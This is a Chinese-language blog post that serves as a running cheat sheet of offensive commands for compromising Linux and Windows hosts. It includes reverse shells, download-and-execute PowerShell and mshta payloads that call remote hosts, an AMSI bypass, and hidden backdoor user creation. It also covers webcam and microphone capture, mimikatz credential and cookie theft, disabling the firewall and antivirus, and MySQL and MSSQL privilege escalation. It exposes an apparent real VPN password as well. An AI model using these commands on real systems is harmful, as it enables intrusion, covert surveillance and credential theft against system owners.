Commands 搜集(持续更新)

Linux

Linux反弹shell后,方便的交互:

python -c 'import pty; pty.spawn("/bin/bash")'

无python时:

expect -c 'spawn bash;interact'

无wget nc等下载工具时下载文件

exec 5<>/dev/tcp/sec-lab.org/80 &&echo -e “GET /c.pl HTTP/1.0\n” >&5 && cat<&5 > c.pl

修改上传文件时间戳(掩盖入侵痕迹)

touch -r 老文件时间戳 新文件时间戳
利用BASH提权

这个要求管理员有su的习惯,我们可以通过它来添加一个id=0的用户

$PROMPT_COMMAND 利用这个变量保存了在主提示符$PS1显示之前需要执行的命令
导入:

export PROMPT_COMMAND=”/usr/sbin/useradd -o -u 0 hack &>/dev/null && echo hacker:123456 | /usr/sbin/chpasswd &>/dev/null && unset PROMPT_COMMAND”

lsof 命令

lsof 1.txt 显示开启文件 abc.txt 的进程
lsof -i :22 知道 22 端口现在运行什么程序
lsof -c nsd 显示 nsd 进程现在打开的文件
lsof -g gid 显示归属 gid 的进程情况
lsof +d /usr/local/ 显示目录下被进程开启的文件
lsof +D /usr/local/ 同上,但是会搜索目录下的目录,时间较长
lsof -d 4 显示使用 fd 为4 的进程
lsof -i [i] 用以显示符合条件的进程情况

SSH端口转发

下面文章详细描述了3种方式转发

http://www.cnblogs.com/david-zhang-index/archive/2012/08/18/2645943.html

图片马

Exiftool “-comment<=raj.php” 1.png

Windows
Powershell 相关

获取无线密码:

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Get-WLAN-Keys.ps1');Get-Wlan-Keys "

提权加账号

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c net user evi1cg test123 /add'"

下载执行:

powershell -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://b.hiphotos.baidu.com/image/pic/item/d009b3de9c82d15825ffd75c840a19d8bd3e42da.jpg','C:\\Users\Public\\test.jpg') & start C:\\Users\\Public\\test.jpg

摄像头录像:

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/xorrior/RandomPS-Scripts/master/MiniEye.ps1'); Capture-MiniEye -RecordTime 2 -Path $env:temp\hack.avi"

录音:

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Exfiltration/Get-MicrophoneAudio.ps1');Get-MicrophoneAudio -Path $env:TEMP\secret.wav -Length 10 -Alias 'SECRET'"
MSHTA
VBSCRIPT EXEC

mshta vbscript:CreateObject("Wscript.Shell").Run("calc.exe",0,true)(window.close)
JAVASCRIPT EXEC

mshta javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im mshta.exe",0,true);}
JSRAT
mshta javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.2.101:9998/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im mshta.exe",0,true);}
Bypass AMSI:
PS C:\> [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
use:

powershell.exe -ExecutionPolicy Bypass -noprofile [Ref].Assembly.GetType(''System.Management.Automation.AmsiUtils'').GetField(''amsiInitFailed'',''NonPublic,Static'').SetValue($null,$true);iex(New-Object Net.WebClient).DownloadString(''http://192.168.230.1/msfpayload.ps1'')
Bypass AV
sqlite3.exe -cmd "select load_extension('1.txt','EP')"
sqlite3.exe -cmd "select load_extension('\\192.168.1.101\share\1.txt','EP')"

mimikatz

获取vpn密码

mimikatz.exe privilege::debug token::elevate lsadump::sam lsadump::secrets exit

读取chrome cookies

mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\cookies /unprotect" exit
mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\USERDA~1" exit
mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\LOGIND~1" exit

提权常用

// What system are we connected to?

systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

// Get the hostname and username (if available)

hostname

echo %username%

// Get users

net users
net user [username]

// Networking stuff

ipconfig /all

// Printer?

route print
// ARP-arific

arp -A

// Active network connections

netstat -ano

// Firewall fun (Win XP SP2+ only)

netsh firewall show state
netsh firewall show config

// Scheduled tasks

schtasks /query /fo LIST /v

// Running processes to started services

tasklist /SVC
net start

// Driver madness

DRIVERQUERY

// WMIC fun (Win 7/8 – XP requires admin)

wmic /?

//Use wmic_info script!

// WMIC: check patch level

wmic qfe get Caption,Description,HotFixID,InstalledOn

// Search pathces for given patch

wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.."

// AlwaysInstallElevated fun

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

// Other commands to run to hopefully get what we need

dir /s *pass* == *cred* == *vnc* == *.config*
findstr /si password *.xml *.ini *.txt
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

// Service permissions

sc query
sc qc [service_name]

// Accesschk stuff download link

accesschk.exe /accepteula (always do this first!!!!!)
accesschk.exe -ucqv [service_name] (requires sysinternals accesschk!)
accesschk.exe -uwcqv "Authenticated Users" * (won't yield anything on Win 8)
accesschk.exe -ucqv [service_name]

// Find all weak folder permissions per drive.

accesschk.exe -uwdqs Users c:\
accesschk.exe -uwdqs "Authenticated Users" c:\

// Find all weak file permissions per drive.

accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*

// Binary planting

sc config [service_name] binpath= "C:\nc.exe -nv [RHOST] [RPORT] -e C:\WINDOWS\System32\cmd.exe"
sc config [service_name] obj= ".\LocalSystem" password= ""
sc qc [service_name] (to verify!)
net start [service_name]
CMD

%ProgramData:~0,1%%ProgramData:~9,2% /c echo

命令行下载

certutil -urlcache -split -f example.com/file

命令行下连接VPN(win):

rasdial "VPN Connection" zhaodg oZ7iFk25

命令行关闭VPN连接(win):

rasphone -h "VPN Connection"

通过pptpsetup(Linux):

pptpsetup --create vpn --server 5x.xxx.xxx.xx2 --username zhaodg --password oZ7iFk25 --encrypt --start

注册表运行程序(用来整蛊挺好玩):

reg add "HKCU\Software\Classes\Folder\shell\open\command" /d "cmd.exe /c cmd.exe" /f && reg add HKCU\Software\Classes\Folder\shell\open\command /v "DelegateExecute" /f  

删除命令:

reg delete "HKCU\Software\Classes\Folder\shell\open\command" /f

Windows Server 2019开启远程桌面

默认情况下,Windows Server 2019将外部远程桌面访问设置为禁用作为安全措施,我们可以轻松地从PowerShell中启用它

使用PowerShell允许远程桌面

我们可以使用Set-ItemPropery cmdlet修改启用或禁用远程桌面的注册表值:

Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0

完成后,使用’Enable-NetFirewallRule’配置Windows防火墙以允许远程桌面连接:
Enable-NetFirewallRule -DisplayGroup “Remote Desktop”
默认情况下,这将允许所有连接
建议尽可能配置更具体的防火墙规则

关闭防火墙:

关闭windows防火墙需要管理员或system权限

netsh advfirewall set allprofiles state off

关闭windefebd

net stop windefend

关闭DEP

bcdedit.exe /set{current} nx AlwaysOff

Bitlocker磁盘加密

manage-bde-off C:
manage-bde-status C:

端口转发类

反弹shell:

shell: nc -e cmd ip port
shell: bash -i >& /dev/tcp/ip/port 0>&1(linux)

服务器: nc -vv -lp port

端口转发:

shell: lcx -slave ip port 127.0.0.1 port

服务器: lcx -listen port 33891

ANTIFW.exe -s #运行程序,将3389转发到80
ANTIFW.exe -l #关闭程序,恢复

cmd探查

信息探测类

systeminfo :查看系统版本信息

netstat -ano : 查看系统开放端口

tasklist /svc : 查看系统进程

ipconfig : 查看ip地址

whoami : 查看当前用户

net user : 查看计算机用户列表

net localgroup : 查看计算机用户组列表

添加用户类

net user mstlab mstlab /add : 添加用户并设置密码

net localgroup administrators mstlab /add : 将用户加入管理组

net user guest /active:yes : 激活guest用户

net user guest mstlab : 更改guest用户的密码

KIll DOG:

Kill Dog:

1.安全狗默认只拦截加管理组,不拦截加用户

法a:利用用户克隆exp:直接克隆administrator的权限
法b:反弹shell读取管理员密码
法c:改注册表替换安全狗的文件,然后重启服务器(redegit /s redegit.reg(redegit.reg见附录))安全狗关闭

2.安全狗账号防护最严程度:拦截添加用户

法a:激活guest,然后克隆用户
法b:反弹shell读取管理员密码
法c:改注册表,重启服务器,关闭安全狗

redegit.reg脚本内容:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SafeDogGuardCenter.exe]
"Debugger"="C:\WWW\l.php"

开启的3389方法:

1.通用开3389(优化后):

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

2.For Win2003:

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

3.For Win2008:

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

4.For Every:

cmd开3389 win08 win03 win7 win2012 winxp

win08,三条命令即可:

wmic /namespace:\root\cimv2    erminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1
wmic /namespace:\root\cimv2    erminalservices path win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') call setuserauthenticationrequired 1
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f

win2012通用;win7前两条即可。权限需要run as administrator

查询终端端口 :

REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
(or) 终端端口:tasklist /svc查询TermService对应PID和netstat查询的PID对应的端口号
(or) 注册表:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\ Wds dpwd\Tds    cp 中PortNumber的值

数据库提权:

UDF手工提权辅助:

select @@basedir;  #查看mysql安装目录
select 'It is dll' into dumpfile 'C:\。。lib::';  #利用NTFS ADS创建lib目录
select 'It is dll' into dumpfile 'C:\。。lib\plugin::';  #利用NTFS ADS创建plugin目录
select 0xUDFcode into dumpfile 'C:\phpstu\MySQL\lib\plugin\mstlab.dll';  #导出udfcode,注意修改udfcode
create function cmdshell returns string soname 'mstlab.dll';   #用udf创建cmd函数,shell,sys_exec,sys_eval
select shell('cmd','net user');     #执行cmd命令

show variables like ‘%plugin%’; #查看plugin路径

小技巧:

1.HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MySQL 注册表中ImagePath的值为mysql安装目录
2.my.ini中datadir的值是数据存放目录
3.UPDATE user set File_priv ='Y';  flush privileges; 强制加file权限

MOF手工提权辅助:

pragma namespace("\\.\root\subscription") 

instance of __EventFilter as  
{ 
    EventNamespace = "Root\Cimv2"; 
    Name  = "filtP2"; 
    Query = "Select * From __InstanceModificationEvent " 
            "Where TargetInstance Isa \"Win32_LocalTime\" " 
            "And TargetInstance.Second = 5"; 
    QueryLanguage = "WQL"; 
}; 

instance of ActiveScriptEventConsumer as  
{ 
    Name = "consPCSV2"; 
    ScriptingEngine = "JScript"; 
    ScriptText = 
    "var WSH = new ActiveXObject(\"WScript.Shell\") WSH.run(\"net.exe user admintony admin /add&&net.exe localgroup administrators admintony /add\")"; 
}; 

instance of __FilterToConsumerBinding 
{ 
    Consumer   = ; 
    Filter = ; 
}; 

保存为 1.mof
然后mysql执行:select load_file('D:/wwwroot/1.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';

SA提权辅助:

1.判断扩展存储是否存在:

select count(*) from master.dbo.sysobjects where xtype = 'x' AND name= 'xp_cmdshell'
select count(*) from master.dbo.sysobjects where name='xp_regread'

恢复:

exec sp_dropextendedproc 'xp_cmdshell'
exec sp_dropextendedproc xp_cmdshell,'xplog70.dll'
EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;(SQL2005)

2.列目录:

exec master..xp_cmdshell 'ver'
(or) exec master..xp_dirtree 'c:\',1,1
(or) drop table black
create TABLE black(mulu varchar(7996) NULL,ID int NOT NULL IDENTITY(1,1))-- 
insert into black exec master..xp_cmdshell 'dir c:\' 
select top 1 mulu from black where id=1
xp_cmdshell被删除时,可以用(4.a)开启沙盒模式,然后(4.b)方法提权

3.备份启动项:

alter database [master] set RECOVERY FULL
create table cmd (a image)
backup log [master] to disk = 'c:\cmd1' with init
insert into cmd (a) values (0x(batcode))
backup log [master] to disk = 'C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\start.bat'
drop table cmd

4.映像劫持

xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','reg_sz','c:\windows\system32\cmd.exe'

5.沙盒模式提权:

法a:

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\JET\Engines','SandBoxMode','REG_DWORD',0;

关闭沙盒模式

法b:

Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user mstlab mstlab /add")'); #or c:\windows\system32\ias\dnary.mdb string类型用此。
开启OpenRowSet:exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;

6.xp_regwrite操作注册表

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\currentversion un','black','REG_SZ','net user test test /add'
开启xp_oacreate:exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;
-------------本文结束❤感谢阅读-------------